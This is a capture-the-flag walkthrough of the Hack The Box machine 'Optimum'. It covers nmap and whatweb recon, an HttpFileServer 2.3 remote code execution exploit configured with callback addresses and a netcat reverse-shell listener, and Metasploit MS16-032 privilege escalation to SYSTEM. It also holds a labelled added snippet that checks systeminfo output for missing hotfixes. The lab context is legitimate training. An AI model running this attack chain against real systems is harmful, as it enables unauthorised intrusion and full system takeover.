
Optimum – HTB Walkthrough

I decided to give myself a challenge with my first HTB box by running through a Windows box, which is something I currently do not have much experience with.

Recon

Starting off, we do some basic recon with nmap on the top 1000 ports, running the banner-grabbing script to check for services.

nmap 10.10.10.8 -sV --script=banner | tee nmap-optimum.txt

This reveals an open HTTP port running HttpFileServer.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:40 EST
Nmap scan report for 10.10.10.8
Host is up (0.022s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.60 seconds

While continuing to do recon, we’ll run a wider nmap scan to find any less-common ports that may be open. In this case, no more open ports were found.

nmap 10.10.10.8 -p- --script=banner

Secondly, I use whatweb to look for any other technologies the page may be using aside from the HttpFileServer that was picked up in the nmap scan.

whatweb 10.10.10.8 | tee whatweb-optimum.txt

This doesn’t reveal any new information that is worthwhile right now, although it’s useful enough to save for later.

Foothold

Now that we have some information to work with, we can start looking for exploits to gain a shell. Using searchsploit, I searched for the file server version we found during the nmap scan.

searchsploit -t HttpFileServer 2.3

Download the exploit from its Exploit-DB page (located here) and open the .py file. Inside the file we can edit the following lines so the exploit works against the target.

lhost = "10.10.14.3"
lport = 4444
rhost = "10.10.10.8"
rport = 80

In a separate terminal window, run a netcat listener with the following command.

nc -lvnp 4444

Finally, run the exploit with:

python3 49584.py

Once we have a shell, the flag is user.txt in the directory we land in: C:\Users\kostas\Desktop.

Priv Esc

Now that we have a shell on the box, we can check what access we have using net localgroup administrators. This shows that there is only one local administrator, named Administrator.

We can also see that there is the built-in guest account, which will not be of use to us.

After some hunting around for potential vulnerabilities, running systeminfo gives us some information about the system we are currently on.

Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 15/11/2024, 7:36:03 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.476 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.908 MB
Virtual Memory: In Use: 595 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

What we are most interested in here are the OS Name and OS Version: Microsoft Windows Server 2012 R2 Standard, 6.3.9600 N/A Build 9600.

A quick Google search leads us to a privilege escalation exploit on Exploit-DB for MS16-032, located here.
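The systeminfo dump above is what a defender would use to answer the same question from the other side: is the hotfix for a given bulletin installed? The following is an added example, not part of the original walkthrough, that parses systeminfo output in the format shown and reports which required KBs are missing. The sample is a constructed, trimmed copy of the output above, and KB0000000 is a placeholder; the real KB number for MS16-032 is not on this page and should be taken from the Microsoft bulletin.

```python
import re

# Constructed sample, trimmed from the systeminfo output shown above.
SAMPLE = """Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
"""

# Hotfix entries look like "[NN]: KBnnnnnnn"; NIC entries share the
# "[NN]:" prefix but never carry a KB number, so they are not matched.
HOTFIX_RE = re.compile(r"^\[\d+\]:\s*(KB\d+)\s*$", re.MULTILINE)


def parse_systeminfo(text):
    """Return the OS name/version and the set of installed KB numbers."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        # Skip the indexed sub-entries; only keep top-level "Key: Value" rows.
        if sep and not key.startswith("["):
            fields[key.strip()] = value.strip()
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "hotfixes": set(HOTFIX_RE.findall(text)),
    }


def missing_hotfixes(info, required):
    """KBs from `required` that are not present in the installed hotfix list."""
    return sorted(kb for kb in required if kb not in info["hotfixes"])


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE)
    print(info["os_name"], info["os_version"])
    # KB0000000 is a placeholder for the bulletin's real KB number.
    print("missing:", missing_hotfixes(info, ["KB2919355", "KB0000000"]))
```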

From here, we have two options: checking whether this is in Metasploit, or looking for a better version elsewhere on the internet, since (as future me found out) there are several issues with invoking this PowerShell script from a standard terminal.

After several hours of attempts, I found the easiest (and least buggy) way of getting root was via Metasploit.

PrivEsc with Metasploit

After opening Metasploit, search for rejetto_hfs_exec and select it. We need to set up a reverse shell session first, which the MS16-032 module will then run through.

lhost = 10.10.14.3
lport = 9999
rhosts = 10.10.10.8
rport = 80

Once that’s set, hit run and watch the magic happen!

Once the Meterpreter session is created, background it with the command background, then search for MS16-032 and select the x64 version with use 2.

Then set your lhost, lport and session to:

lhost = 10.10.14.3
lport = 5555
session = 1

Once you run it, it will hang for a moment while the script runs, and if all went according to plan, you now have root access on the box! Within the Meterpreter session, type shell to drop into the command line.

You can confirm you are root by typing whoami: if you appear as nt authority\system, you’re in. Now it’s as simple as navigating to C:/Users/Administrator/Desktop and reading root.txt.

Room complete!

Issues and Afterthoughts

As this was my first Windows box, there were quite a few hurdles to get through. A large portion of this came from doing enumeration and file transfer once I had a shell on the box; however, the vast majority of the pain on this box came from the MS16-032 exploit and attempting to get it working.

I initially attempted to use WinPEAS (link here); however, after multiple failed attempts due to the shell hanging when trying to run anything that was not an individual module, I started manually searching for potential vulnerabilities.

Secondly, there were some learning opportunities in using Impacket to copy files via its SMB server (link here).

The main problem, however, was attempting to use the Exploit-DB exploit for MS16-032: working out how to use it without reading a walkthrough of this room proved extremely challenging, as most of the examples were run directly in PowerShell while remotely connected to the box.

I did find in my research that this required 64-bit PowerShell, as that is what the exploit needed to run. In this case, however, no matter how much I tried, I could not get this to work through the shell.

I did learn some useful PowerShell information while connected to the target over a shell, such as the -c flag to run commands without locking up the shell, and -executionpolicy bypass to run scripts the execution policy would otherwise block.

In hindsight, picking a newer box and not spending so much time trying to avoid Metasploit would have been advantageous, as I would not have spent most of my afternoon troubleshooting something I already had a solution for.

It would also be worthwhile to investigate more Windows enumeration methods going forward to avoid manually hunting for vulnerabilities.
